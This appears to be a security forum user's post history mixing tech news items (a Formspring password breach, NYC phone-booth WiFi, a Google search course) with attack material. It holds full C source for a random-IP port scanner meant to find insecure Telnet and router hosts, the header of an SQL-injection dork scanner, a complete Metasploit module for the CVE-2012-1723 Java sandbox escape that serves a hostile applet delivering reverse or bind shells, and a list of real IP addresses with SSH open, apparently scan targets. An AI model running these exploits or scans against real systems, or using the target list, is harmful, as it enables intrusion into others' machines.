-
Posts
3206 -
Joined
-
Days Won
87
Everything posted by Fi8sVrs
-
vezi pe aici: https://rstcenter.com/forum/52016-smtp-sms-gateway.rst
-
/* Compile with: gcc thrip.c -o thrip -pthread This is a multithreaded scanner that scans many ip addresses on a specified port simultaneously. It is very useful for finding insecure systems when used with such ports as 23 (Telnet) or 8080, which is the web interface for many routers. The author of this program takes no responsiblity for the actions of its users. If you have any comments or suggestions, feeel free to contact me at this email: grell64[at]gmail.com. Thanks and enjoy. -Grell */ /* Compile with: gcc thrip.c -o thrip -pthread This is a multithreaded scanner that scans many ip addresses on a specified port simultaneously. It is very useful for finding insecure systems when used with such ports as 23 (Telnet) or 8080, which is the web interface for many routers. The author of this program takes no responsiblity for the actions of its users. If you have any comments or suggestions, feeel free to contact me at this email: grell64@gmail.com. Thanks and enjoy. -Grell */ #include <stdio.h> #include <string.h> #include <time.h> #include <stdlib.h> #include <pthread.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <errno.h> void usage(char *); void *net_thread(void *); FILE *glob_file; int glob_port; static pthread_mutex_t mtx = PTHREAD_MUTEX_INITIALIZER; static pthread_mutex_t mtx2 = PTHREAD_MUTEX_INITIALIZER; int main(int argc, char *argv[]) { int numthreads, rc; long i; srand(time(NULL)); if(argc != 4) usage(argv[0]); glob_port = atoi(argv[1]); numthreads = atoi(argv[2]); unsigned long *taskids[numthreads]; pthread_t thread_array[numthreads]; glob_file = fopen(argv[3], "w+"); // generate array of random ip addresses for(i = 0; i <= numthreads; i++) { taskids[i] = (long *) malloc(sizeof(long)); *taskids[i] = i; rc = pthread_create(&thread_array[i], NULL, net_thread, (void *) taskids[i]); } // wait for all threads to finish for(i = 0; i <= numthreads; i++) { pthread_join(thread_array[i], NULL); } return 0; } void usage(char *progname) { fprintf(stderr, "Usage: %s <port> <numthread> <output file>\n", progname); exit(1); } void *net_thread(void *thr_arg) { int sockfd, s, g; unsigned long connip; unsigned int a, b, c, d; struct sockaddr_in mysock; char str_ip[30]; connip = (rand()) * (long) (thr_arg); // separate bytes in connip a = (connip >> 24 & 0xFF); b = (connip >> 16 & 0xFF); c = (connip >> 8 & 0xFF); d = (connip & 0xFF); if(a == 0x7F){ //loopback return 0; } s = pthread_mutex_lock(&mtx); printf("Scanning: %d.%d.%d.%d\n", a, b, c, d); fflush(stdout); s = pthread_mutex_unlock(&mtx); if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){ perror("socket"); pthread_exit(NULL); } snprintf(str_ip, sizeof(str_ip), "%d.%d.%d.%d", a, b, c, d); bzero(&mysock, sizeof(mysock)); mysock.sin_family = AF_INET; mysock.sin_port = htons(glob_port); // short, network byte order mysock.sin_addr.s_addr = htonl(connip); if((connect(sockfd, (struct sockaddr *) &mysock, sizeof(mysock))) == -1){ switch(errno){ case ECONNREFUSED: case ETIMEDOUT: // add mutex s = pthread_mutex_lock(&mtx); fprintf(glob_file, "Port %d Closed on %s\n", glob_port, str_ip); fflush(glob_file); s = pthread_mutex_unlock(&mtx); break; default: break; } return 0; } /* connection succeeds */ else{ g = pthread_mutex_lock(&mtx2); fprintf(glob_file, "Port %d Open on %s\n", glob_port, str_ip); fflush(glob_file); g = pthread_mutex_unlock(&mtx2); return 0; } return 0; } Thrip Port Scanner ? Packet Storm
-
This is w0rmy's Codebase, a database with snippets. You DO NOT have rights to re-sell this! This is a freeware. You MAY post this anywhere, with given credits (below). Snippets added by: flAmingw0rm Special thanks to StarZ (coder of this) and Aeonhack (Editor). Enjoy. Zippyshare.com - w0rmyCodebase.rar Download w0rmyCodebase.rar from Sendspace.com - send big files the easy way Download w0rmy.Codebase.rar @ UppIT level-23.biz
-
e veche ideea, insa mai sunt multi care pica in special onanistii
-
#!/usr/bin/python # # smartd0rk3r.py - a modified darkd0rk3r # - added dork array # - added input for number of random dorks # - added bugfix for over tor (it crashed alot over tor) # - added optimization, 1 page with 0 results, skip to next dork # - added extra check for links to comply with target (makes it alot more target-specific) # put main instructions together, added 12 - new scan option # - added Column Finder # # rewrite done by levi # Column Finder added by baltazar # mad propz to the original author for making a nice script that was easily modified!!!! # # original header: # # This was written for educational purpose and pentest only. Use it at your own risk. # Author will be not responsible for any damage! # !!! Special greetz for my friend sinner_01 !!! # Toolname : darkd0rk3r.py # Coder : baltazar a.k.a b4ltazar < [email]b4ltazar@gmail.com[/email]> # Version : 0.8 # Greetz for rsauron and low1z, great python coders # greetz for d3hydr8, r45c4l, qk, fx0, Soul, MikiSoft, c0ax, b0ne, tek0t and all members of ex darkc0de.com, ljuska.org [Python] smartd0rk3r.py v.0.2 - Pastebin.com source .
-
New York City Pay Phone Booths Now Free WiFi Hotspots New York City is committed to making sure the 12,000 phone booths still lining its sidewalks don't become relics. While the city announced plans to turn some of them into digital kiosks with SmartScreens in April, today it launched a pilot program to provide free public WiFi at public phone booths around the five boroughs. WATCH: A Look At the New WiFi-Equipped Phone Booths The first ten booths were lit up today with WiFi routers that are attached the top of existing phone booths. A map of the WiFi-equipped booths can be found here. There are six booths in Manhattan, two in Brooklyn, and one in Queens for the time being. Additional locations, including ones in the Bronx and Staten Island, will be added soon. The city's Department of Information Technology and Telecommunications (DoITT) has worked with Van Wagner and Titan, the advertising companies that work to provide the ads on the booths, to provide the service. Those companies have absorbed the cost of the project, including installation, management, and customer service; there is no additional cost to the city or to the public. And wireless capabilities won't replace the actual pay phones. "We are not trying to replace the pay phone with something else," Rhaul N. Merchant, Citywide Chief Information and Innovation Officer, said at the unveiling of the new booth on 58th Street and Broadway. "We want to see what else our citizens want in a pay phone." The wireless signal of the pay phone booths will span an 100 to 200 foot radius and the network will appear as "Free WiFi" or "NYC Free Public WiFi" on phones, laptops, tablets, and other WiFi devices. The network isn't password protected, but when you launch your browser, you will be required to agree to terms and conditions before surfing the web. "The city and the partners have taken all security measures and we will continue to make sure it the best possible experience for new Yorkers who are signing on to the WiFi," Rachel Sterne, New York's Chief Digital Officer, assured ABC News. Users can visit any site on the internet and there is no limit on usage. No personal information will be gathered from people's devices, and no advertising will appear during the pilot program, Sterne said. via: New York City Pay Phone Booths Now Free WiFi Hotspots - ABC News
-
Java Applet Field Bytecode Verifier Cache Remote Code Execution
Fi8sVrs posted a topic in Exploituri
This Metasploit module exploits a vulnerability in HotSpot bytecode verifier where an invalid optimization of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checks. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :javascript => false }) def initialize( info = {} ) super( update_info( info, 'Name' => 'Java Applet Field Bytecode Verifier Cache Remote Code Execution', 'Description' => %q{ This module exploits a vulnerability in HotSpot bytecode verifier where an invalid optimisation of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficent type checks. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations. }, 'License' => MSF_LICENSE, 'Author' => [ 'Stefan Cornellius', # Discoverer 'mihi', # Vuln analysis 'littlelightlittlefire', # metasploit module 'juan vazquez', # merged code (overlapped) 'sinn3r' # merged code (overlapped) ], 'References' => [ ['CVE', '2012-1723'], ['OSVDB', '82877'], ['BID', '52161'], ['URL', 'http://schierlm.users.sourceforge.net/CVE-2012-1723.html'], ['URL', 'http://www.oracle.com/technetwork/topics/security/javacpujun2012-1515912.html'], ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=829373'], ['URL', 'http://icedtea.classpath.org/hg/release/icedtea7-forest-2.1/hotspot/rev/253e7c32def9'], ['URL', 'http://icedtea.classpath.org/hg/release/icedtea7-forest-2.1/hotspot/rev/8f86ad60699b'] ], 'Platform' => [ 'java', 'win', 'osx', 'linux', 'solaris' ], 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', { 'Platform' => ['java'], 'Arch' => ARCH_JAVA } ], [ 'Windows x86 (Native Payload)', { 'Platform' => 'win', 'Arch' => ARCH_X86 } ], [ 'Mac OS X PPC (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_PPC } ], [ 'Mac OS X x86 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X86 } ], [ 'Linux x86 (Native Payload)', { 'Platform' => 'linux', 'Arch' => ARCH_X86 } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 06 2012' )) end def exploit # load the static jar file path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-1723.jar" ) fd = File.open( path, "rb" ) @jar_data = fd.read(fd.stat.size) fd.close super end def on_request_uri( cli, request ) data = "" host = "" port = "" if not request.uri.match(/\.jar$/i) if not request.uri.match(/\/$/) send_redirect( cli, get_resource() + '/', '') return end print_status("Sending #{self.name}") payload = regenerate_payload( cli ) if not payload print_error("Failed to generate the payload." ) return end if target.name == 'Generic (Java Payload)' if datastore['LHOST'] jar = payload.encoded host = datastore['LHOST'] port = datastore['LPORT'] vprint_status("Sending java reverse shell") else port = datastore['LPORT'] datastore['RHOST'] = cli.peerhost vprint_status( "Java bind shell" ) end if jar print_status( "Generated jar to drop (#{jar.length} bytes)." ) jar = Rex::Text.to_hex( jar, prefix="" ) else print_error("Failed to generate the executable." ) return end else # NOTE: The EXE mixin automagically handles detection of arch/platform data = generate_payload_exe if data print_status("Generated executable to drop (#{data.length} bytes)." ) data = Rex::Text.to_hex( data, prefix="" ) else print_error("Failed to generate the executable." ) return end end send_response_html( cli, generate_html( data, jar, host, port ), { 'Content-Type' => 'text/html' } ) return end print_status("Sending jar") send_response( cli, generate_jar(), { 'Content-Type' => "application/octet-stream" } ) handler( cli ) end def generate_html( data, jar, host, port ) jar_name = rand_text_alpha(rand(6)+3) + ".jar" html = "<html><head></head>" html += "<body>" html += "<applet archive=\"#{jar_name}\" code=\"cve1723.Attacker\" width=\"1\" height=\"1\">" html += "<param name=\"data\" value=\"#{data}\"/>" if data html += "<param name=\"jar\" value=\"#{jar}\"/>" if jar html += "<param name=\"lhost\" value=\"#{host}\"/>" if host html += "</applet></body></html>" return html end def generate_jar() @jar_data end end http://packetstorm.crazydog.pt/1207-exploits/java_verifier_field_access.rb.txt Source Java Applet Field Bytecode Verifier Cache Remote Code Execution ? Packet Storm -
The question-and-answer site informs users that some of their passwords may have been breached in a security intrusion. Formspring has suffered a security intrusion in which some of its user passwords may have been breached, the question-and-answer site warned today. Formspring, which said it only learned of the network intrusion this morning, responded by disabling all users' passwords. "We apologize for the inconvenience but prefer to play it safe and have asked all members to reset their passwords," Formspring founder and CEO Ade Olonoh said in a company blog post. "Users will be prompted to change their passwords when they log back into Formspring. " A Formspring spokesperson told CNET that the company was tipped off to breach by someone who spotted about 420,000 passwords posted to a security forum that appeared to come from Formspring. "Once we were able to verify that the hashes were obtained from Formspring, we locked down our systems and began an investigation to determine the nature of the breach," Dorothee Fisher said. "We found that someone had accessed into one of our development servers and was able to extract account information from a production database. We were able to immediately fix the hole and are reviewing our internal security policies and practices to help ensure that this never happens again." The San Francisco-based startup, which launched its site in 2009, announced earlier this year that it had nearly 28 million users. In the blog's comments section, many dissatisfied users expressed a desire to have their accounts deleted, but a company representative assured them that their passwords had all been "salted," a cryptography technique that makes it harder to uncover the actual password. The blog went on to give users a tutorial in creating strong passwords -- a helpful reminder in the wake of more high-profile password thefts at LinkedIn, eHarmony, and Last.fm. Their users passwords were among approximately 8 million posted in two separate lists to hacker sites in early June. It appears that while they were hashed, they were not salted Source Formspring disables user passwords in security breach | Security & Privacy - CNET News
-
THE FREE HANDWRITING CALCULATOR FOR YOUR ANDROID DEVICES With MyScript© Calculator, perform mathematical operations naturally using your handwriting. Easy, simple and intuitive, just write the mathematical expression on the screen then let MyScript technology perform its magic converting symbols and numbers to digital text and delivering the result in real time. The same experience as writing on paper with the advantages of a digital device (Scratch-outs, results in real time, ...). BENEFITS AND FEATURES - Works on your Android smartphone - Works on your Android tablet - Use your handwriting to write any arithmetic formula. - Write and calculate mathematical expressions in an intuitive and natural way with no keyboard - Supported mathematical symbols: +, -, ×, /, ?, Pi, parentheses - Scratch-out gestures to easily delete symbols and numbers Download https://play.google.com/store/apps/details?id=com.visionobjects.calculator Source
-
good_ips.txt with Hostname IP%20%20%20%20%20%20%20%20%20%20%20%20%20%20Ping%20%20%20%20%20%20%20%20%20%20%20%20Hostname%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20Ports%20%20%20%20%20%20%20%20%20%20%20%0A93.191.241.148%20%2043%20ms%20%20%20%20%20%20%20%20%20%20%2093-191-241-148.vmdns.net22%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A72.43.214.67%20%20%20%20-109%20ms%20%20%20%20%20%20%20%20%20rrcs-72-43-214-67.nys.biz.rr.com22%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A216.57.65.193%20%20%20-27%20ms%20%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A88.235.161.15%20%20%2050%20ms%20%20%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A95.18.185.147%20%20%20-109%20ms%20%20%20%20%20%20%20%20%20147.185.18.95.dynamic.jazztel.es22%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A91.123.204.90%20%20%20101%20ms%20%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A91.121.184.90%20%20%2041%20ms%20%20%20%20%20%20%20%20%20%20%20ns364216.ovh.net%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A216.108.236.146%20431%20ms%20%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A107.6.66.130%20%20%20%20-122%20ms%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A201.47.207.2%20%20%20%20272%20ms%20%20%20%20%20%20%20%20%20%20201.47.207.2.dynamic.adsl.gvt.net.br22%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A74.213.27.25%20%20%20%20-96%20ms%20%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A78.47.28.74%20%20%20%20%2036%20ms%20%20%20%20%20%20%20%20%20%20%20mail01.haebi.li%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A74.115.253.209%20%20-94%20ms%20%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A219.140.68.6%20%20%20%20298%20ms%20%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A124.40.41.146%20%20%20315%20ms%20%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A72.33.101.11%20%20%20%20-92%20ms%20%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A107.21.155.69%20%20%20-117%20ms%20%20%20%20%20%20%20%20%20ec2-107-21-155-69.compute-1.amazonaws.com22%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A111.68.205.88%20%20%20176%20ms%20%20%20%20%20%20%20%20%20%20jinkei.jp%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A216.181.17.86%20%20%20-125%20ms%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A75.172.182.214%20%20-36%20ms%20%20%20%20%20%20%20%20%20%2075-172-182-214.phnx.qwest.net22%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A74.94.174.85%20%20%20%20-92%20ms%20%20%20%20%20%20%20%20%20%2074-94-174-85-NewEngland.hfc.comcastbusiness.net22%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A78.129.208.141%20%2051%20ms%20%20%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A120.36.10.149%20%20%20375%20ms%20%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A78.83.157.193%20%20%2063%20ms%20%20%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A109.123.115.210%2044%20ms%20%20%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A72.47.232.217%20%20%20-42%20ms%20%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A223.5.134.222%20%20%20356%20ms%20%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A201.39.40.150%20%20%20284%20ms%20%20%20%20%20%20%20%20%20%20meganet-F2-0-5-gacc01.fla.embratel.net.br22%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A76.12.74.141%20%20%20%20-125%20ms%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A111.240.115.152%20355%20ms%20%20%20%20%20%20%20%20%20%20111-240-115-152.dynamic.hinet.net22%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A200.80.94.205%20%20%20-89%20ms%20%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A109.95.5.197%20%20%20%2065%20ms%20%20%20%20%20%20%20%20%20%20%20PC-109-95-5-197.net-com.net.pl22%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A216.187.79.81%20%20%20-51%20ms%20%20%20%20%20%20%20%20%20%20remotecontrolhelicopter.com22%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A79.182.155.86%20%20%20111%20ms%20%20%20%20%20%20%20%20%20%20bzq-79-182-155-86.red.bezeqint.net22%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A207.57.188.216%20%20-121%20ms%20%20%20%20%20%20%20%20%20wellmadetools.net%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A124.110.137.134%20305%20ms%20%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A74.213.16.201%20%20%20-100%20ms%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A109.206.74.130%20%2053%20ms%20%20%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A124.65.39.3%20%20%20%20%20586%20ms%20%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A76.8.77.90%20%20%20%20%20%20-114%20ms%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A109.73.186.95%20%20%2087%20ms%20%20%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A122.90.5.12%20%20%20%20%20195%20ms%20%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A216.180.246.194%20-115%20ms%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A120.197.81.205%20%20291%20ms%20%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A89.180.3.215%20%20%20%2093%20ms%20%20%20%20%20%20%20%20%20%20%2089-180-3-215.net.novis.pt22%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A217.146.84.86%20%20%2051%20ms%20%20%20%20%20%20%20%20%20%20%20wallbanged.that.nerd.adulki.on.onepointsix.eu22%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A91.201.56.22%20%20%20%2038%20ms%20%20%20%20%20%20%20%20%20%20%20softplusweb.soft-plus.ch22%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A111.93.80.82%20%20%20%2048%20ms%20%20%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A108.179.201.142%20-93%20ms%20%20%20%20%20%20%20%20%20%20lis.listwise-o1.net%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A95.149.143.153%20%2078%20ms%20%20%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A205.212.188.18%20%20-50%20ms%20%20%20%20%20%20%20%20%20%20rabbit-g.co.jp%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A220.68.236.3%20%20%20%20360%20ms%20%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A74.119.17.146%20%20%20-99%20ms%20%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A207.226.162.71%20%20120%20ms%20%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A122.201.111.202%20360%20ms%20%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A79.180.105.132%20%2028%20ms%20%20%20%20%20%20%20%20%20%20%20bzq-79-180-105-132.red.bezeqint.net22%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A200.38.11.65%20%20%20%20-52%20ms%20%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A108.160.114.13%20%20-71%20ms%20%20%20%20%20%20%20%20%20%20%5Bn/a%5D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2022%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A75.166.184.15%20%20%20-55%20ms%20%20%20%20%20%20%20%20%20%2075-166-184-15.hlrn.qwest.net22 without Hostname OTMuMTkxLjI0MS4xNDglMEE3Mi40My4yMTQuNjclMEEyMTYuNTcuNjUuMTkzJTBBODguMjM1LjE2MS4xNSUwQTk1LjE4LjE4NS4xNDclMEE5MS4xMjMuMjA0LjkwJTBBOTEuMTIxLjE4NC45MCUwQTIxNi4xMDguMjM2LjE0NiUwQTEwNy42LjY2LjEzMCUwQTIwMS40Ny4yMDcuMiUwQTc0LjIxMy4yNy4yNSUwQTc4LjQ3LjI4Ljc0JTBBNzQuMTE1LjI1My4yMDklMEEyMTkuMTQwLjY4LjYlMEExMjQuNDAuNDEuMTQ2JTBBNzIuMzMuMTAxLjExJTBBMTA3LjIxLjE1NS42OSUwQTExMS42OC4yMDUuODglMEEyMTYuMTgxLjE3Ljg2JTBBNzUuMTcyLjE4Mi4yMTQlMEE3NC45NC4xNzQuODUlMEE3OC4xMjkuMjA4LjE0MSUwQTEyMC4zNi4xMC4xNDklMEE3OC44My4xNTcuMTkzJTBBMTA5LjEyMy4xMTUuMjEwJTBBNzIuNDcuMjMyLjIxNyUwQTIyMy41LjEzNC4yMjIlMEEyMDEuMzkuNDAuMTUwJTBBNzYuMTIuNzQuMTQxJTBBMTExLjI0MC4xMTUuMTUyJTBBMjAwLjgwLjk0LjIwNSUwQTEwOS45NS41LjE5NyUwQTIxNi4xODcuNzkuODElMEE3OS4xODIuMTU1Ljg2JTBBMjA3LjU3LjE4OC4yMTYlMEExMjQuMTEwLjEzNy4xMzQlMEE3NC4yMTMuMTYuMjAxJTBBMTA5LjIwNi43NC4xMzAlMEExMjQuNjUuMzkuMyUwQTc2LjguNzcuOTAlMEExMDkuNzMuMTg2Ljk1JTBBMTIyLjkwLjUuMTIlMEEyMTYuMTgwLjI0Ni4xOTQlMEExMjAuMTk3LjgxLjIwNSUwQTg5LjE4MC4zLjIxNSUwQTIxNy4xNDYuODQuODYlMEE5MS4yMDEuNTYuMjIlMEExMTEuOTMuODAuODIlMEExMDguMTc5LjIwMS4xNDIlMEE5NS4xNDkuMTQzLjE1MyUwQTIwNS4yMTIuMTg4LjE4JTBBMjIwLjY4LjIzNi4zJTBBNzQuMTE5LjE3LjE0NiUwQTIwNy4yMjYuMTYyLjcxJTBBMTIyLjIwMS4xMTEuMjAyJTBBNzkuMTgwLjEwNS4xMzIlMEEyMDAuMzguMTEuNjUlMEExMDguMTYwLjExNC4xMyUwQTc1LjE2Ni4xODQuMTU=
-
Want to learn how to find cat videos in Japanese, the location of that photo your friend took or the name of the book you just can’t remember? Now there’s an online course for that. Google is running a free Massive Open Online Course (MOOC), enriched with social and communication tools to help you become a “Google Power Searcher.” The online course will start on July 10 and will be comprised of six 50-minute classes which can be completed within your own time during a two-week window. “The lessons include interactive activities to practice new skills, and many opportunities to connect with others using Google tools such as Google Groups, Moderator and Google+, including Hangouts on Air, where world-renowned search experts will answer your questions on how search works. Googlers will also be on hand during the course period to help and answer your questions in case you get stuck,” said Terry Ednacot, Education Program Manager at Google. The Power Searching with Google course is just one of many free online courses that you can take to enrich your life and expand your skill set. US universities Stanford and MIT have been pioneering the online course format via Coursera and MITx. Other notable online courses can be found on Codecademy, the Khan academy and iTunes U. To sign up for Power Searching with Google visit Power Searching with Google – Inside Search – Google source yahoo
-
pune link direct fara adf.ly,tinyurl s.a.m.d.
-
NICT has developed Daedalus, a cyber-attack alert system. Daedalus renders attacks on networks visible in real time. The sphere in the center represents the Internet, and the circles moving around it represent networks under observation. The state of an attack is shown using 3D graphics, and can be viewed from any perspective. Today's cyber-attacks breach boundary defenses from inside and outside organizations, including the spread of malware via USB memory sticks and mail attachments, as well as zero-day exploits. So, using Daedalus together with conventional boundary systems is expected to improve network security within organizations. The technology for this system will be transferred to clwit, which will include it in a commercial alert service called SiteVisor. NICT also provides the system free of charge to educational institutions where nicter sensors can be installed. source: DigInfo TV
-
- 1
-
